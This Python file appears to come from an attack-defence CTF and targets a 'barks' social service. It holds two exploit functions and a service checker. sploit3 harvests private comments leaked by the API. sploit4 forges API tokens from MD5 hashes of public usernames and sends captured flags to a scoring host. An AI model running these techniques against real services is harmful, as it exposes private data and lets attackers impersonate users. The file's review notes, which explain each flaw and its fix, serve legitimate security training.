def sploit3(hostname: str) -> list:
    """Collect flag-shaped private comments readable by a brand-new account.

    Registers a throwaway user, obtains an API token for it, then walks up to
    ten pages of recent barks and reads the comments of every bark listed.

    NOTE(review): the new account has no relationship to the bark authors, so
    any hit here means the comments endpoint returned ``is_private`` entries
    to an unrelated caller. The remedy is server-side: filter private
    comments by the requester's identity before serialising the response.

    Args:
        hostname: Host of the service instance under test.

    Returns:
        Texts of comments marked private that match ``FLAG_REGEXP``.
    """
    client = Api(hostname)
    login = get_random_string()
    client.sing_up(login, get_random_string(), get_random_string(), get_random_string())
    api_token = client.generate_token()

    collected = []
    for page in range(10):
        page_barks = client.api_get_last_barks(api_token, page)
        for entry in page_barks:
            for remark in client.api_comments(api_token, entry["id"]):
                if remark["is_private"] and FLAG_REGEXP.match(remark["text"]):
                    collected.append(remark["text"])
        # An empty page ends the walk; the test stays after the inner loop so
        # a non-iterable response still fails exactly where it did before.
        if not page_barks:
            break
    return collected
def sploit4(hostname: str) -> list:
    """Collect private comments using API tokens recomputed from usernames.

    Registers a throwaway user, lists the first page of barks and users, and
    for each listed user computes ``md5(username + generation)`` for every
    value in ``generations`` (defined elsewhere in the file). A candidate the
    index endpoint accepts is then used to read comments, and the flags
    gathered so far are reported to the scoring endpoint.

    NOTE(review): a token that is a plain MD5 of a public username plus a
    value from a small set is reproducible by anyone who can list users.
    Presumably this mirrors how the service derives tokens; the remedy is to
    issue tokens from a CSPRNG (e.g. ``secrets.token_hex``), store them
    server-side, and rate-limit token validation.

    NOTE(review): the nesting below was rebuilt from a listing whose
    indentation was lost; confirm the placement of the report and ``break``.

    Args:
        hostname: Host of the service instance under test.

    Returns:
        Texts of comments marked private that match ``FLAG_REGEXP``.
    """
    client = Api(hostname)
    login = get_random_string()
    client.sing_up(login, get_random_string(), get_random_string(), get_random_string())
    session_token = client.generate_token()

    flags = []
    tokens = []  # never read in the visible code
    first_page = 0
    bark_ids = [bark["id"] for bark in client.api_get_last_barks(session_token, first_page)]

    for user in client.api_get_users(session_token, first_page):
        for generation in generations:
            candidate = hashlib.md5(
                f"{user['username']}{generation}".encode()).hexdigest()
            if not client.api_index(candidate):
                continue
            print(candidate)
            for bark_id in bark_ids:
                flags.extend(
                    remark["text"]
                    for remark in client.api_comments(candidate, bark_id)
                    if remark["is_private"] and FLAG_REGEXP.match(remark["text"])
                )
            print(flags)
            requests.put("http://10.118.0.10/flags", headers={"X-Team-Token": TOKEN}, json=flags)
            # One accepted token per user is enough; move on to the next user.
            break
    return flags
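def check(check_request: CheckRequest) -> Verdict:
    """Run the functional check of one service instance.

    Walks the web flow (register, post a bark, comment, friend request and
    confirmation, login, token generation) and then reads the same data back
    through the token-authenticated API endpoints.

    Args:
        check_request: Request carrying the ``hostname`` of the instance.

    Returns:
        ``Verdict.OK()`` when every step passes, ``Verdict.MUMBLE(...)`` when
        a step returns unexpected data or any non-network error occurs, and
        ``Verdict.DOWN(...)`` on a ``RequestException``.
    """
    api = Api(check_request.hostname)
    try:
        username = get_random_str()
        password = get_random_str()
        r = api.sing_up(username, password, get_random_str(), get_random_str())
        # NOTE(review): here and in the checks below only a 200 response is
        # inspected, so a non-200 status passes the step — confirm that this
        # is intended rather than a missing `!= 200 or` guard.
        if r.status_code == 200 and f"{api.url}/{username}/" != r.url:
            print(f"Found {r.url}, but wait {api.url}/{username}. Status code {r.status_code}")
            return Verdict.MUMBLE("can't pass registration")

        bark = get_random_text()
        r = api.add_bark(username, bark)
        # Precedence: (status 200 and wrong URL) or (bark text missing).
        if r.status_code == 200 and f"{api.url}/{username}/" != r.url or bark not in r.text:
            print(f"Found {r.url}, but wait {api.url}/{username} OR '{bark}' not in response. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't create bark")

        # Takes the id from the "/get_bark/<id>" fragment that precedes the
        # bark text; the [0:-3] slice drops three trailing characters
        # (presumably markup after the id — confirm against the template).
        bark_id = int(r.text.split(bark)[0].split("/get_bark/")[1][0:-3])

        comment = get_random_text()
        r = api.comment_bark(bark_id, comment)
        if r.status_code == 200 and comment not in r.text:
            print(f"Comment {comment} not in response. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't create comment")
        api.logout()

        # A second account sends the friend request to the first one.
        new_username = get_random_str()
        new_password = get_random_str()
        api.sing_up(new_username, new_password, get_random_str(), get_random_str())
        r = api.add_friend(username)
        if r.status_code == 200 and username not in r.text:
            print(f"Can't find {username} in friends list. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't add friend")
        api.logout()

        r = api.login(username, password)
        if r.status_code == 200 and f"{api.url}/{username}/" != r.url:
            print(f"Found {r.url}, but wait {api.url}/{username}. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't log in")

        r = api.confirm_friend(new_username)
        # NOTE(review): this looks for `username` (the logged-in account), not
        # `new_username` (the friend being confirmed) — verify which was meant.
        if r.status_code == 200 and username not in r.text:
            print(f"Friend {username} not found in friends list. Status code: {r.status_code}")
            return Verdict.MUMBLE("can't confirm friend")

        token = api.generate_token()
        if not token:
            print("Can't get token")
            return Verdict.MUMBLE("can't get token")
        api.logout()

        # From here on only the API token is used; the web session is closed.
        user_dict = api.api_index(token)
        if user_dict['username'] != username or user_dict['token'] != token:
            print(f"Fields username and token isn't correct. Found: {user_dict['username']}, {user_dict['token']}. Wait: {username}, {token}")
            return Verdict.MUMBLE("api user info incorrect")

        # The diagnostic lists what was received instead of reading the loop
        # variable: with an empty list that variable was unbound, and the
        # resulting NameError surfaced as the unrelated "bad proto" verdict.
        barks_list = api.api_barks(token, username)
        if not any(user_bark['text'] == bark for user_bark in barks_list):
            print(f"Wait for '{bark}', but got {[b['text'] for b in barks_list]}")
            return Verdict.MUMBLE("incorrect bark")

        comments_list = api.api_comments(token, bark_id)
        if not any(user_comment['text'] == comment for user_comment in comments_list):
            print(f"Wait for '{comment}', but got {[c['text'] for c in comments_list]}")
            return Verdict.MUMBLE("incorrect comment")

        user_info = api.api_user_info(token, username)
        if user_info['username'] != username or user_info['id'] != user_dict['id']:
            print(f"Incorrect user_info. Got {user_info['username']}, {user_info['id']}, but wait {username}, {user_dict['id']}")
            return Verdict.MUMBLE("incorrect user info")

        # The new user must show up within the first five pages of the listing.
        for i in range(0, 5):
            users_list = api.api_get_users(token, i)
            if any(u['username'] == username and u['id'] == user_dict['id'] for u in users_list):
                break
        else:
            print("can't find user via api")
            return Verdict.MUMBLE("can't find user")

        # Same for the bark; the message previously said "user" (copy-paste).
        for i in range(0, 5):
            barks_list = api.api_get_last_barks(token, i)
            if any(b['id'] == bark_id for b in barks_list):
                break
        else:
            print("can't find bark via api")
            return Verdict.MUMBLE("can't find bark")

        return Verdict.OK()
    except RequestException as e:
        print(f"can't connect due to {e}")
        return Verdict.DOWN("can't connect to host")
    except Exception as e:
        # Boundary handler: any parsing or schema error counts as a protocol
        # violation by the service.
        print(e)
        return Verdict.MUMBLE("bad proto")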